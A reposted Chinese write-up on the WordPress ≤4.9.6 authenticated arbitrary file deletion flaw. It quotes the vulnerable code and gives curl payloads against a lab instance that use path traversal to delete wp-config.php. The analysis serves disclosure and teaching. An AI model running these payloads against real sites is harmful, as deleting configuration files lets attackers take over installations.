当前位置: 开发笔记 > 后端 > 正文

Wordpress<=4.9.6任意文件删除漏洞

作者：sijiamian_767 | 来源：互联网 | 2023-09-24 17:09

wordpress,lt,4,9,6,任

本文转载自：Wordpress <= 4.9.6 任意文件删除漏洞 - http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility/

Wordpress <= 4.9.6 任意文件删除漏洞

WordPress是如今使用最为广泛的一套内容管理系统。根据 w3tech 统计，全世界大概有30%的网站运行着WordPress程序。

昨日RIPS团队公开了一个Wordpress的任意文件删除漏洞（需要登录），目前该漏洞仍然未修复（2018年06月27日），该漏洞影响 Wordpress 最新版 4.9.6.

本文我们将结合 VulnSpy 的在线 WordPress 环境来演示该漏洞的利用。

VulnSpy Wordpress 4.9 在线环境: http://www.vulnspy.com/wordpress-4.9/wordpress_4.9/

漏洞分析

文件wp-includes/post.php中：

function wp_delete_attachment( $post_id, $force_delete = false ) { ... $meta = wp_get_attachment_metadata( $post_id ); ... if ( ! empty($meta['thumb']) ) { // Don't delete the thumb if another attachment uses it. if (! $wpdb->get_row( $wpdb->prepare( "SELECT meta_id FROM $wpdb->postmeta WHERE meta_key = '_wp_attachment_metadata' AND meta_value LIKE %s AND post_id <> %d", '%' . $wpdb->esc_like( $meta['thumb'] ) . '%', $post_id)) ) { $thumbfile = str_replace(basename($file), $meta['thumb'], $file); /** This filter is documented in wp-includes/functions.php */ $thumbfile = apply_filters( 'wp_delete_file', $thumbfile ); @ unlink( path_join($uploadpath['basedir'], $thumbfile) ); } } ... }

$meta['thumb']来自与数据库，是图片的属性之一。代码未检查$meta['thumb']的内容，直接带入unlink函数，如果$meta['thumb']可控则可导致文件删除。

文件/wp-admin/post.php中：

... switch($action) { ... case 'editattachment': check_admin_referer('update-post_' . $post_id); ... // Update the thumbnail filename $newmeta = wp_get_attachment_metadata( $post_id, true ); $newmeta['thumb'] = $_POST['thumb']; wp_update_attachment_metadata( $post_id, $newmeta ); ...

$newmeta['thumb']来自于$_POST['thumb']，未经过滤直接将其存入数据库，即上一步的$meta['thumb']可控。

详细分析可见：WARNING: WordPress File Delete to Code Execution - https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/

漏洞利用

1. 使用VSPlate安装你的Wordpress 4.9

Wordpress 4.9 在线环境: http://www.vulnspy.com/wordpress-4.9/wordpress_4.9/

vulnspy

2. 登录后台，添加媒体

访问 http://9c9b.vsplate.me/wp-admin/upload.php, 上传任意图片.

vulnspy

3. 将 $meta['thumb'] 设置为我们要删除的文件

3.1 点击第二步中我们上传的图片, 并记住图片ID.

vulnspy

3.2 访问 http://9c9b.vsplate.me/wp-admin/post.php?post=4&action=edit. 在网页源代码中找到 _wpnonce.

vulnspy

3.3 发送Payload:

curl -v 'http://9c9b.vsplate.me/wp-admin/post.php?post=4' -H 'COOKIE: ***' -d 'action=editattachment&_wpnOnce=***&thumb=../../../../wp-config.php'

vulnspy

4. 删除文件

4.1 在网页源码中找到另外一个 _wpnonce.

vulnspy

4.2 发送Payload:

curl -v 'http://9c9b.vsplate.me/wp-admin/post.php?post=4' -H 'COOKIE: ***' -d 'action=delete&_wpnOnce=***'

vulnspy

5. 刷新网页

已经可以重装网站。

vulnspy

wordpress

推荐阅读

php
使用 jQuery 实现页面加载进度条

页面加载进度条是提升用户体验的重要工具，通过在页面头部显示一个加载状态，并在页面完全加载后隐藏，可以有效减少用户的等待焦虑。本文将详细介绍如何使用 jQuery 实现这一功能。 ... [详细]

蜡笔小新 2024-11-18 20:00:09
php
精选优质开源应用程序

本文介绍了多个广泛使用的优质开源应用程序，包括内容管理系统（CMS）、电子商务平台和企业资源管理工具等。这些应用不仅功能强大，而且具有高度的可扩展性和社区支持。 ... [详细]

蜡笔小新 2024-11-16 15:08:02
php
FreeBSD环境下PHP GD库安装问题的详细解决方案

在 FreeBSD 环境下，安装 PHP GD 库时可能会遇到一些常见的问题。本文详细介绍了从配置到编译的完整步骤，包括解决依赖关系、配置选项以及常见错误的处理方法。通过这些详细的指导，开发者可以顺利地在 FreeBSD 上完成 PHP GD 库的安装，确保其正常运行。此外，本文还提供了一些优化建议，帮助提高安装过程的效率和稳定性。 ... [详细]

蜡笔小新 2024-11-09 17:50:30
php
Swoole加密机制的安全性分析与破解可能性探讨

本文深入分析了Swoole框架的加密机制，探讨了其在实际应用中的安全性，并评估了潜在的破解可能性。研究结果表明，尽管Swoole的加密算法在大多数情况下能够提供有效的安全保护，但在特定场景下仍存在被攻击的风险。文章还提出了一些改进措施，以增强系统的整体安全性。 ... [详细]

蜡笔小新 2024-11-09 13:49:38
php
探究HTML5应用中的三种Accordion交互效果

在HTML5应用中，Accordion（手风琴，又称抽屉）效果因其独特的展开和折叠样式而广泛使用。本文探讨了三种不同的Accordion交互效果，通过层次结构优化信息展示和页面布局，提升用户体验。这些效果不仅增强了视觉效果，还提高了内容的可访问性和互动性。 ... [详细]

蜡笔小新 2024-11-04 18:09:29
php
优化后的标题：hCalendar微格式：深入解析事件与时间、地点相关的活动标记方法

本文深入探讨了 hCalendar 微格式在事件与时间、地点相关活动标记中的应用。作为微格式系列文章的第四篇，前文已分别介绍了 rel 属性用于定义链接关系、XFN 微格式增强链接的人际关系描述以及 hCard 微格式对个人和组织信息的描述。本次将重点解析 hCalendar 如何通过结构化数据标记，提高事件信息的可读性和互操作性。 ... [详细]

蜡笔小新 2024-11-04 17:57:52
mq
深入解读张鑫旭文章，探索全新CSS属性

近日，我仔细研读了张鑫旭关于知乎上十个热门问题的文章（http://www.zhangxinxu.com/wordpress/2017/06/ten-questions-about-css/）。这篇文章不仅详细解答了这些常见问题，还深入探讨了一些全新的CSS属性，为前端开发者提供了宝贵的见解和实用技巧。通过张鑫旭的专业解析，读者可以更好地理解和应用这些新特性，提升网页设计和开发的效率与质量。 ... [详细]

蜡笔小新 2024-11-04 17:56:11
ci
2016-2017学年《网络安全实战》第三次作业

2016-2017学年《网络安全实战》第三次作业总结了教材中关于网络信息收集技术的内容。本章主要探讨了网络踩点、网络扫描和网络查点三个关键步骤。其中，网络踩点旨在通过公开渠道收集目标信息，为后续的安全测试奠定基础，而不涉及实际的入侵行为。 ... [详细]

蜡笔小新 2024-11-04 13:00:16
php
如何在AppFog免费云平台上部署WordPress：详细图文指南

AppFog 是一个基于 CloudFoundry 的多语言 PaaS（平台即服务）提供商，允许用户在其平台上轻松构建和部署 Web 应用程序。本文将通过详细的图文步骤，指导读者如何在 AppFog 免费云平台上成功部署 WordPress，帮助用户快速搭建个人博客或网站。 ... [详细]

蜡笔小新 2024-11-02 12:50:27
php
Norton Partition Magic 中 PHP 函数 error_reporting(E_ALL ^ E_NOTICE) 的详细解析与应用

在 Windows 环境下，通过具体示例分析了 `Norton Partition Magic` 中 `PHP` 函数 `error_reporting(E_ALL ^ E_NOTICE)` 的详细解析与应用。该函数用于控制错误报告级别，例如在从 PHP 4.3.0 升级到 4.3.1 后，程序出现多处错误的原因及解决方法。本文深入探讨了错误报告配置对程序稳定性的影响，并提供了实用的调试技巧。 ... [详细]

蜡笔小新 2024-11-01 20:40:18
php
DedeCMS单页面开发指南：以“关于我们”页面为例的详细步骤与技巧

在开发DedeCMS企业模板时，常常需要创建如“关于我们”等单页面。由于DedeCMS不直接支持像WordPress那样的独立页面功能，但可以通过调用栏目内容来实现这一需求。本文详细介绍了如何利用DedeCMS的栏目功能，结合具体步骤和技巧，帮助网站管理员高效地创建和管理单页面内容。 ... [详细]

蜡笔小新 2024-11-01 07:58:20
php
手机上编写和运行PHP代码的最佳软件推荐

手机上编写和运行PHP代码的最佳软件推荐 ... [详细]

蜡笔小新 2024-10-27 21:10:40
php
如何解决在 CentOS 5.8 系统中使用云服务器 ECS 执行 mkfs.ext4 时出现“command not found”错误

如何解决在 CentOS 5.8 系统中使用云服务器 ECS 执行 mkfs.ext4 时出现“command not found”错误 ... [详细]

蜡笔小新 2024-10-27 17:58:38
php
如何在LNMP环境中为WordPress博客安装SSL证书：从程序下载到完成配置

在LNMP环境下为WordPress博客安装SSL证书的详细步骤，从软件下载到最终配置完成。本文将指导您如何在已设置好的VPS上通过WinSCP等工具上传WordPress程序，并顺利完成SSL证书的安装与配置，确保网站的安全性和数据传输的加密。 ... [详细]

蜡笔小新 2024-10-26 19:17:59
ci
在Linux系统中Nginx环境下SSL证书的安装步骤与WordPress CDN的高级配置指南

在Linux系统中，Nginx环境下安装SSL证书的具体步骤及WordPress CDN的高级配置指南。首先，安装SSL证书需要准备两个关键配置文件，并建议在操作前备份相关服务器配置文件，以确保数据安全。随后，本文将详细介绍如何在Nginx中正确配置SSL证书，以及如何优化WordPress的CDN设置，提升网站性能和安全性。 ... [详细]

蜡笔小新 2024-10-26 09:59:17

sijiamian_767

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章